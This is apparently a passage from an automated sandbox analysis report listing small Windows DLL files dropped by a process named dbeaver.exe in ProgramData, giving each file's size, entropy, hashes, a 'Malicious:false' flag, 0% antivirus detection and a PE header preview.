      SHA-512:F8E3476A09D888CAEBD50DA0EA2DEBC4006004E72AF677919413655AB4595622CAC524F1BC6C13406EE341AE0052A19ED83826AD530F652E73B2C65D4FA65680
      Malicious:false
      Antivirus:
      • Antivirus: ReversingLabs, Detection: 0%
      Reputation:unknown
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3A..w e.w e.w e..De.v e..Da.u e..D..v e..Dg.v e.Richw e.........PE..d....C............" .........................................................0.......-....`.........................................`................ ...................=..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
      Category:dropped
      Size (bytes):18696
      Entropy (8bit):7.01639527920599
      Encrypted:false
      SSDEEP:
      MD5:A5883C68D432F593812AB3B755B808DB
      SHA1:51CBB7BA47802DC630C2507750432C55F5979C27
      SHA-256:B3715112A7CA4C6CC0EFEE044BD82444D3267A379E33A3EC118D87E75604204D
      SHA-512:27153E29E99A905FA4C8B3EDE078644A3A3F29FDF7B98E387E39C5C60444E326C92AFD74DA8FEE225F7DDF39724A0DAEF68BA238F3CC64FB7860172B8F29D79A
      Malicious:false
      Antivirus:
      • Antivirus: ReversingLabs, Detection: 0%
      Reputation:unknown
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3A..w e.w e.w e..De.v e..Da.u e..D..v e..Dg.v e.Richw e.........PE..d.....Z..........." .........................................................0......X?....`.........................................`................ ...................=..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
      Category:dropped
      Size (bytes):22280
      Entropy (8bit):6.9179162203047495
      Encrypted:false
      SSDEEP:
      MD5:241338AEF5E2C18C80FB1DB07AA8BCDF
      SHA1:9ACBEEF0AC510C179B319CA69CD5378D0E70504D
      SHA-256:56DE091EFE467FE23CC989C1EE21F3249A1BDB2178B51511E3BD514DF12C5CCB
      SHA-512:B9FD37F01A58594E48FA566C41827B2B9499605D9E55C2178E83EE41C8C5F50A4DF2C85EFEA94CA586EA0EA4A6D984EBB7CA2193E9306FCB853B147B2C76BC2D
      Malicious:false
      Antivirus:
      • Antivirus: ReversingLabs, Detection: 0%
      Reputation:unknown
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3A..w e.w e.w e..De.v e..Da.u e..D..v e..Dg.v e.Richw e.........PE..d....Q............" .........................................................@.......|....`.........................................`................0...................=..............T............................................................................rdata..............................@..@.rsrc........0......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
      Category:dropped
      Size (bytes):18696
      Entropy (8bit):6.993868508484722
      Encrypted:false
      SSDEEP:
      MD5:49C3FFD47257DBCB67A6BE9EE112BA7F
      SHA1:04669214375B25E2DC8A3635484E6EEB206BC4EB
      SHA-256:322D963D2A2AEFD784E99697C59D494853D69BED8EFD4B445F59292930A6B165
      SHA-512:BDA5E6C669B04AAED89538A982EF430CEF389237C6C1D670819A22B2A20BF3C22AEF5CB4E73EF7837CBBD89D870693899F97CB538122059C885F4B19B7860A98
      Malicious:false
      Antivirus:
      • Antivirus: ReversingLabs, Detection: 0%
      Reputation:unknown
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3A..w e.w e.w e..De.v e..Da.u e..D..v e..Dg.v e.Richw e.........PE..d...,,.W.........." .........................................................0............`.........................................`...L............ ...................=..............T............................................................................rdata..H...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
      Category:dropped
      Size (bytes):18696
      Entropy (8bit):7.054510010549814
      Encrypted:false
      SSDEEP:
      MD5:BFFFA7117FD9B1622C66D949BAC3F1D7
      SHA1:402B7B8F8DCFD321B1D12FC85A1EE5137A5569B2
      SHA-256:1EA267A2E6284F17DD548C6F2285E19F7EDB15D6E737A55391140CE5CB95225E
      SHA-512:B319CC7B436B1BE165CDF6FFCAB8A87FE29DE78F7E0B14C8F562BE160481FB5483289BD5956FDC1D8660DA7A3F86D8EEDE35C6CC2B7C3D4C852DECF4B2DCDB7F
      Malicious:false
      Antivirus:
      • Antivirus: ReversingLabs, Detection: 0%
      Reputation:unknown
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3A..w e.w e.w e..De.v e..Da.u e..D..v e..Dg.v e.Richw e.........PE..d...4.F>.........." .........................................................0............`.........................................`................ ...................=..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
      Category:dropped
      Size (bytes):18696
      Entropy (8bit):6.998147659672995
      Encrypted:false
      SSDEEP:
      MD5:CCE27FF9B1E78B61955682788452F785
      SHA1:A2E2A40CEA25EA4FD64B8DEAF4FBE4A2DB94107A
      SHA-256:8EE2DE377A045C52BBB05087AE3C2F95576EDFB0C2767F40B13454F2D9F779DE
      SHA-512:1FCEC1CD70426E3895C48598DFC359839D2B3F2B1E3E94314872A866540353460EC932BF3841E5AFE89AA4D6C6FAC768E21AE368D68C2BB15F65960F6F5D7D5B
      Malicious:false
      Antivirus:
      • Antivirus: ReversingLabs, Detection: 0%
      Reputation:unknown
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3A..w e.w e.w e..De.v e..Da.u e..D..v e..Dg.v e.Richw e.........PE..d.....QN.........." .........................................................0............`.........................................`...`............ ...................=..............T............................................................................rdata..`...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
      Category:dropped
      Size (bytes):19208
      Entropy (8bit):6.963329589517269
      Encrypted:false
      SSDEEP:
      MD5:CDC266896E0DBE6C73542F6DEC19DE23
      SHA1:B4310929CCB82DD3C3A779CAB68F1F9F368076F2
      SHA-256:87A5C5475E9C26FABFEAD6802DAC8A62E2807E50E0D18C4BFADCB15EBF5BCBC0
      SHA-512:79A29041699F41938174A6EC9797FAF8D6BF7764657D801CB3AF15C225F8EAB0135D59CFA627BD02DD7459F7B857D62299E4D082586CE690627EBDF1267EBB21
      Malicious:false
      Antivirus:
      • Antivirus: ReversingLabs, Detection: 0%
      Reputation:unknown
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3A..w e.w e.w e..De.v e..Da.u e..D..v e..Dg.v e.Richw e.........PE..d...T.*..........." .........................................................0......n.....`.........................................`................ ...................=..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
      Category:dropped
      Size (bytes):18696
      Entropy (8bit):7.00560797197583
      Encrypted:false
      SSDEEP:
      MD5:39809CC5DABF769DA8871A91A8ED9E69
      SHA1:F779CDEF9DED19402AA72958085213D6671CA572
      SHA-256:5CD00FF4731691F81FF528C4B5A2E408548107EFC22CC6576048B0FDCE3DFBC9
      SHA-512:83A8246839D28378C6F6951D7593DC98B6CAA6DBCA5FBD023B00B3B1A9EBA0597943838C508493533C2DE276C4D2F9107D890E1C9A493EE834351CFF5DFD2CAB
      Malicious:false
      Antivirus:
      • Antivirus: ReversingLabs, Detection: 0%
      Reputation:unknown
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3A..w e.w e.w e..De.v e..Da.u e..D..v e..Dg.v e.Richw e.........PE..d...3Qb..........." .........................................................0......X.....`.........................................`................ ...................=..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
      Category:dropped
      Size (bytes):19720
      Entropy (8bit):6.969703170679177
      Encrypted:false
      SSDEEP:
      MD5:5D5FAE1A17961D6EE37637F04FE99B8A
      SHA1:47143A66B4A2E2BA019BF1FD07BCCA9CFB8BB117
      SHA-256:8E01EB923FC453F927A7ECA1C8AA5643E43B360C76B648088F51B31488970AA0
      SHA-512:9DB32EC8416320DCB28F874B4679D2D47A5AE56317FDC9D2D65EBB553F1D6345C3DD0024294A671A694337683DD4E77254595A9CDBFE115C80D0EF53516D46AA
      Malicious:false
      Antivirus:
      • Antivirus: ReversingLabs, Detection: 0%
      Reputation:unknown
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3A..w e.w e.w e..De.v e..Da.u e..D..v e..Dg.v e.Richw e.........PE..d...:............." .........................................................0...........`.........................................`................ ...................=..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
      Category:dropped
      Size (bytes):21256
      Entropy (8bit):6.999439379402039
      Encrypted:false
      SSDEEP:
      MD5:588BD2A8E0152E0918742C1A69038F1D
      SHA1:9874398548891F6A08FC06437996F84EB7495783
      SHA-256:A07CC878AB5595AACD4AB229A6794513F897BD7AD14BCEC353793379146B2094
      SHA-512:32FFE64C697F94C4DB641AB3E20B0F522CF3EBA9863164F1F6271D2F32529250292A16BE95F32D852480BD1B59B8B0554C1E7FD7C7A336F56C048F4F56E4D62F
      Malicious:false
      Antivirus:
      • Antivirus: ReversingLabs, Detection: 0%
      Reputation:unknown
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3A..w e.w e.w e..De.v e..Da.u e..D..v e..Dg.v e.Richw e.........PE..d.....=X.........." .........................................................0......c.....`.........................................`................ ...................=..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
      Category:dropped
      Size (bytes):19208
      Entropy (8bit):6.988263632360211
      Encrypted:false
      SSDEEP:
      MD5:6DEF20ED13972F3C3F08DBA8ECF3D6CC
      SHA1:9C03356CF48112563BB845479F40BF27B293E95E
      SHA-256:C2E887A17875D39099D662A42F58C120B9CC8A799AFD87A9E49ADF3FADDD2B68
      SHA-512:5B4D2B1152BED14108DC58D358B1082E27DEFD1001D36CD72EC6F030A34D6CAF9B01C3C1DD8A9AC66D1937FCF86A6FE3469AC93B1E76D933A8F4B51C1F782F65
      Malicious:false
      Antivirus:
      • Antivirus: ReversingLabs, Detection: 0%
      Reputation:unknown
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3A..w e.w e.w e..De.v e..Da.u e..D..v e..Dg.v e.Richw e.........PE..d....`Z.........." .........................................................0......4.....`.........................................`...l............ ...................=..............T............................................................................rdata..l...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
      Category:dropped
      Size (bytes):19208
      Entropy (8bit):6.968498181647119
      Encrypted:false
      SSDEEP:
      MD5:C712515D052A385991D30B9C6AFC767F
      SHA1:9A4818897251CACB7FE1C6FE1BE3E854985186AD
      SHA-256:F7C6C7EA22EDD2F8BD07AA5B33CBCE862EF1DCDC2226EB130E0018E02FF91DC1
      SHA-512:B7D1E22A169C3869AA7C7C749925A031E8BDD94C2531C6FFE9DAE3B3CD9A2EE1409CA26824C4E720BE859DE3D4B2AF637DD60308C023B4774D47AFE13284DCD2
      Malicious:false
      Antivirus:
      • Antivirus: ReversingLabs, Detection: 0%
      Reputation:unknown
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3A..w e.w e.w e..De.v e..Da.u e..D..v e..Dg.v e.Richw e.........PE..d................" .........................................................0............`............................................."............ ...................=..............T............................................................................rdata..2...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
      Category:dropped
      Size (bytes):20744
      Entropy (8bit):6.988912266221658
      Encrypted:false
      SSDEEP:
      MD5:F0D507DE92851A8C0404AC78C383C5CD
      SHA1:78FA03C89EA12FF93FA499C38673039CC2D55D40
      SHA-256:610332203D29AB218359E291401BF091BB1DB1A6D7ED98AB9A7A9942384B8E27
      SHA-512:A65C9129EE07864F568C651800F6366BCA5313BA400814792B5CC9AA769C057F357B5055988C414E88A6CD87186B6746724A43848F96A389A13E347EF5064551
      Malicious:false
      Antivirus:
      • Antivirus: ReversingLabs, Detection: 0%
      Reputation:unknown
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3A..w e.w e.w e..De.v e..Da.u e..D..v e..Dg.v e.Richw e.........PE..d...#..j.........." .........................................................0............`.......................................................... ...................=..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
      Category:dropped
      Size (bytes):19720
      Entropy (8bit):6.948901824610626
      Encrypted:false
      SSDEEP:
      MD5:F9E20DD3B07766307FCCF463AB26E3CA
      SHA1:60B4CF246C5F414FC1CD12F506C41A1043D473EE
      SHA-256:AF47AEBE065AF2F045A19F20EC7E54A6E73C0C3E9A5108A63095A7232B75381A
      SHA-512:13C43EEE9C93C9F252087CB397FF2D6B087B1DC92A47BA5493297F080E91B7C39EE5665D6BDC1A80E7320E2B085541FC798A3469B1F249B05DEE26BBBB6AB706
      Malicious:false
      Antivirus:
      • Antivirus: ReversingLabs, Detection: 0%
      Reputation:unknown
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3A..w e.w e.w e..De.v e..Da.u e..D..v e..Dg.v e.Richw e.........PE..d.....#..........." .........................................................0......]N....`.......................................................... ...................=..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
      Category:dropped
      Size (bytes):19208
      Entropy (8bit):7.029158368882181
      Encrypted:false
      SSDEEP:
      MD5:AB206F2943977256CA3A59E5961E3A4F
      SHA1:9C1DF49A8DBDC8496AC6057F886F5C17B2C39E3E
      SHA-256:B3B6EE98ACA14CF5BC9F3BC7897BC23934BF85FC4BC25B7506FE4CD9A767047A
      SHA-512:BACCC304B091A087B2300C10F6D18BE414ABB4C1575274C327104AABB5FDF975BA26A86E423FDA6BEFB5D7564EFFAC0C138EB1BAD2D2E226131E4963C7AAC5BD
      Malicious:false
      Antivirus:
      • Antivirus: ReversingLabs, Detection: 0%
      Reputation:unknown
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3A..w e.w e.w e..De.v e..Da.u e..D..v e..Dg.v e.Richw e.........PE..d................" .........................................................0......K.....`.............................................e............ ...................=..............T............................................................................rdata..u...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
      Category:dropped
      Size (bytes):27912
      Entropy (8bit):6.630573984882858
      Encrypted:false
      SSDEEP:
      MD5:4DD7A61590D07500704E7E775255CB00
      SHA1:8B35EC4676BD96C2C4508DC5F98CA471B22DEED7
      SHA-256:A25D0654DEB0CEA1AEF189BA2174D0F13BDF52F098D3A9EC36D15E4BFB30C499
      SHA-512:1086801260624CF395BF971C9FD671ABDDCD441CCC6A6EAC55F277CCFBAB752C82CB1709C8140DE7B4B977397A31DA6C9C8B693AE92264EB23960C8B1E0993BD
      Malicious:false
      Antivirus:
      • Antivirus: ReversingLabs, Detection: 0%
      Reputation:unknown
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3A..w e.w e.w e..De.v e..Da.u e..D..v e..Dg.v e.Richw e.........PE..d...+H............" .........,...............................................P......*@....`..............................................%...........@...............0...=..............T............................................................................rdata...&.......(..................@..@.rsrc........@.......,..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
      Category:dropped
      Size (bytes):26888
      Entropy (8bit):6.6336781806240035
      Encrypted:false
      SSDEEP:
      MD5:4E033CFEE32EDF6BE7847E80A5114894
      SHA1:91EEF52C557AEFD0FDE27E8DF4E3C3B7F99862F2
      SHA-256:DFF24441DF89A02DDE1CD984E4D3820845BAFDFF105458ED10D510126117115B
      SHA-512:E1F3D98959D68EF3D7E86AC4CB3DBDF92A34FCFD1BF0E0DB45DB66C65AF0162AB02926DC5D98C6FC4A759A6010026EE26A9021C67C0190DA941A04B783055318
      Malicious:false
      Antivirus:
      • Antivirus: ReversingLabs, Detection: 0%
      Reputation:unknown
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3A..w e.w e.w e..De.v e..Da.u e..D..v e..Dg.v e.Richw e.........PE..d...V..*.........." .........(...............................................P.......q....`.............................................. ...........@...............,...=..............T............................................................................rdata...".......$..................@..@.rsrc........@.......(..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
      Category:dropped
      Size (bytes):71432
      Entropy (8bit):5.830979570412824
      Encrypted:false
      SSDEEP:
      MD5:50740F0BC326F0637C4166698298D218
      SHA1:0C33CFE40EDD278A692C2E73E941184FD24286D9
      SHA-256:ADBB658DD1CBECACA7CC1322B51976F30B36CCF0A751F3BAD1F29D350B192C9C
      SHA-512:F1331AB1D52FB681F51546168E9736E2F6163E0706955E85AC9E4544D575D50E6EACD90EA3E49CB8B69DA34FE0B621B04661F0B6F09F7CE8CECA50308C263D03
      Malicious:false
      Antivirus:
      • Antivirus: ReversingLabs, Detection: 0%
      Reputation:unknown
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3A..w e.w e.w e..De.v e..Da.u e..D..v e..Dg.v e.Richw e.........PE..d...Y..b.........." .................................................................A....`.............................................-................................=..............T............................................................................rdata..=...........................@..@.rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
      Category:dropped
      Size (bytes):19720
      Entropy (8bit):6.972767516542363
      Encrypted:false
      SSDEEP:
      MD5:595D79870970565BE93DB076AFBE73B5
      SHA1:EC96F7BEEAEC14D3B6C437B97B4A18A365534B9B
      SHA-256:FC50A37ACC35345C99344042D7212A4AE88AA52A894CDA3DCB9F6DB46D852558
      SHA-512:152849840A584737858FC5E15F0D7802786E823A13EC5A9FC30EE032C7681DEAF11C93A8CFFEAD82DC5F73F0CD6F517F1E83B56D61D0E770CBB20E1CFFF22840
      Malicious:false
      Antivirus:
      • Antivirus: ReversingLabs, Detection: 0%
      Reputation:unknown
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3A..w e.w e.w e..De.v e..Da.u e..D..v e..Dg.v e.Richw e.........PE..d...*j............" .........................................................0............`.............................................x............ ...................=..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
      Category:dropped
      Size (bytes):23304
      Entropy (8bit):6.842580906884736
      Encrypted:false
      SSDEEP:
      MD5:8B9B0D1C8B0E9D4B576D42C66980977A
      SHA1:A19ACEFA3F95D1B565650FDBC40EF98C793358E9
      SHA-256:371A44AB91614A8C26D159BEB872A7B43F569CB5FAC8ADA99ACE98F264A3B503
      SHA-512:4B1C5730A17118B7065FADA3B36944FE4E0260F77676B84453EE5042F6F952A51FD99DEBCA835066A6D5A61BA1C5E17247551340DD02D777A44BC1CAE84E6B5F
      Malicious:false
      Antivirus:
      • Antivirus: ReversingLabs, Detection: 0%
      Reputation:unknown
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3A..w e.w e.w e..De.v e..Da.u e..D..v e..Dg.v e.Richw e.........PE..d....V.4.........." .........................................................@............`.............................................4............0...................=..............T............................................................................rdata..D...........................@..@.rsrc........0......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
      Category:dropped
      Size (bytes):24840
      Entropy (8bit):6.792113276202437
      Encrypted:false
      SSDEEP:
      MD5:76E0A89C91A28CF7657779D998E679E5
      SHA1:982B5DA1C1F5B9D74AF6243885BCBA605D54DF8C
      SHA-256:0189CBD84DEA035763A7E52225E0F1A7DCEC402734885413ADD324BFFE688577
      SHA-512:D75D8798EA3C23B3998E8C3F19D0243A0C3A3262CFFD8BCEE0F0F0B75F0E990C9CE6644150D458E5702A8AA51B202734F7A9161E795F8121F061139AD2EA454F
      Malicious:false
      Antivirus:
      • Antivirus: ReversingLabs, Detection: 0%
      Reputation:unknown
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3A..w e.w e.w e..De.v e..Da.u e..D..v e..Dg.v e.Richw e.........PE..d....Z?..........." ......... ...............................................@............`.............................................a............0...............$...=..............T............................................................................rdata..a...........................@..@.rsrc........0....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
      Category:dropped
      Size (bytes):24840
      Entropy (8bit):6.781450882014829
      Encrypted:false
      SSDEEP:
      MD5:96DA689947C6E215A009B9C1ECA5AEC2
      SHA1:7F389E6F2D6E5BEB2A3BAF622A0C0EA24BC4DE60
      SHA-256:885309EB86DCCD8E234BA05E13FE0BF59AB3DB388EBFBF6B4FD6162D8E287E82
      SHA-512:8E86FA66A939FF3274C2147463899DF575030A575C8F01573C554B760A53B339127D0D967C8CF1D315428E16E470FA1CC9C2150BB40E9B980D4EBF32E226EE89
      Malicious:false
      Antivirus:
      • Antivirus: ReversingLabs, Detection: 0%
      Reputation:unknown
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3A..w e.w e.w e..De.v e..Da.u e..D..v e..Dg.v e.Richw e.........PE..d...|P=z.........." ......... ...............................................@............`..........................................................0...............$...=..............T............................................................................rdata..............................@..@.rsrc........0....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
      Category:dropped
      Size (bytes):21256
      Entropy (8bit):6.916930865406901
      Encrypted:false
      SSDEEP:
      MD5:6B33B34888CCECCA636971FBEA5E3DE0
      SHA1:EE815A158BAACB357D9E074C0755B6F6C286B625
      SHA-256:00AC02D39B7B16406850E02CA4A6101F45D6F7B4397CC9E069F2CE800B8500B9
      SHA-512:F52A2141F34F93B45B90EB3BBCDB64871741F2BD5FED22EAAF35E90661E8A59EBA7878524E30646206FC73920A188C070A38DA9245E888C52D25E36980B35165
      Malicious:false
      Antivirus:
      • Antivirus: ReversingLabs, Detection: 0%
      Reputation:unknown
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3A..w e.w e.w e..De.v e..Da.u e..D..v e..Dg.v e.Richw e.........PE..d................" .........................................................0............`.......................................................... ...................=..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
      Category:dropped
      Size (bytes):19208
      Entropy (8bit):7.018564704523169
      Encrypted:false
      SSDEEP:
      MD5:54F27114EB0FDA1588362BB6B5567979
      SHA1:EAA07829D012206AC55FB1AF5CC6A35F341D22BE
      SHA-256:984306A3547BE2F48483D68D0466B21DDA9DB4BE304BEDC9FFDB953C26CAC5A1
      SHA-512:18D2BDCE558655F2088918241EFDF9297DFE4A14A5D8D9C5BE539334AE26A933B35543C9071CEDADA5A1BB7C2B20238E9D012E64EB5BBF24D0F6B0B726C0329D
      Malicious:false
      Antivirus:
      • Antivirus: ReversingLabs, Detection: 0%
      Reputation:unknown
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3A..w e.w e.w e..De.v e..Da.u e..D..v e..Dg.v e.Richw e.........PE..d..............." .........................................................0......= ....`.............................................^............ ...................=..............T............................................................................rdata..n...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
      Category:dropped
      Size (bytes):18432
      Entropy (8bit):5.305534214939171
      Encrypted:false
      SSDEEP:
      MD5:BDF546466C5AE9F1060B8C66BA260216
      SHA1:78EB996F3FB114B444144B9F3E722AC7644D5B06
      SHA-256:4A3B11F5B6AD0D86B22072701AC77382DA3B31CA692CE6F5DBF639DD58B8EEDD
      SHA-512:E547805C1D178DFC73EE8C6663B4804E0165322DFEEEB0B5B0FE8212775FA9A498266E75AB93662DD85F07F94672DD3940DA0254FB4EFE0251F3B7B7DC2A67DF
      Malicious:false
      Antivirus:
      • Antivirus: ReversingLabs, Detection: 0%
      Reputation:unknown
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......,73.hV].hV].hV].a..`V]..&\.jV]..&X.cV]..&Y.`V]..&^.kV].3>\.nV]..'\.kV].hV\.$V]..'Y.jV]..'].iV]..'..iV]..'_.iV].RichhV].................PE..d...6............." .........,......."....................................................`..........................................=..d...d@.......p.......`..p...............$....5..p...........................@6..0............0..h............................text...H........................... ..`.rdata.......0......."..............@..@.data...H....P.......<..............@....pdata..p....`.......>..............@..@.rsrc........p.......B..............@..@.reloc..$............F..............@..B........................................................................................................................................................................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
      Category:dropped
      Size (bytes):1470976
      Entropy (8bit):6.413813175419177
      Encrypted:false
      SSDEEP:
      MD5:540DBBB8258D74C215CD7B0B06AC2D71
      SHA1:69942C9F0ED34380436EA5CE8386254FB8355ABD
      SHA-256:5343222C61E501036E6A9C4020DD403D81DF24EF4187C86E575F26280D031065
      SHA-512:4A0B5DFBF35D0F1B4BA77CC13DC9B4379CC6E1F00AFD0C4DB852901EF3A909873B2271D09B55BB22122F36888B3CCCD87F03C1B687F4199B80492DBE4C3A6672
      Malicious:false
      Antivirus:
      • Antivirus: ReversingLabs, Detection: 0%
      Reputation:unknown
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......]........................................................B......B..........&.....M.....{..........y...........Rich....................PE..d...9..D.........." ................0.....................................................`................................................V.......`...9......................X9..h...p.......................(...0...0...................|v..`....................text............................... ..`.rdata...}.......~..................@..@.data...(....p.......`..............@....pdata...............0..............@..@.rsrc....9...`...:..................@..@.reloc..X9.......:...8..............@..B........................................................................................................................................................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
      Category:dropped
      Size (bytes):781824
      Entropy (8bit):6.533997673513375
      Encrypted:false
      SSDEEP:
      MD5:8CC0E0801E3C78ECA90985A6CB379AEC
      SHA1:089C3279EE05311B997270B4105BD5129E3E9061
      SHA-256:A61B92FCF2C0B9742AEF26792BAAFF8567D0A4EFDC61D0165607049DB81E6CEA
      SHA-512:7C392304D48E250E48DA8C3FD73D7F23A3020F03412885F07D97E2D7459B084FE47E422B0783FF0D4F3D7E2D9EA3B7B2C49A116310FC686724D2864C50058261
      Malicious:false
      Antivirus:
      • Antivirus: ReversingLabs, Detection: 0%
      Reputation:unknown
      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........>.._..._..._...'g.._..d/..._....3.._..d/._..d/._..d/..._...7..._..+...._..._..._..+.._..+.._..+...._..+...._..+...._..Rich._..........................PE..d......G.........." .........d..............................................P............`.........................................0|..........@....0...........U...........@..@...`...p...............................0...............0............................text...H........................... ..`.rdata..t...........................@..@.data....!..........................@....pdata...U.......V..................@..@.rsrc........0......................@..@.reloc..@....@......................@..B................................................................................................................................................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
      Category:dropped
      Size (bytes):531968
      Entropy (8bit):6.617893844463237
      Encrypted:false
      SSDEEP:
      MD5:483717E35B6AFFC9074E72DCF31CEE5F
      SHA1:8C2AF4F806A2EAAFFF2A6857C2C30A21A41845CD
      SHA-256:EA0FC34C206F582D6416EF01764AE0C24B6788AB5ACDF10121A99577B534F7EA
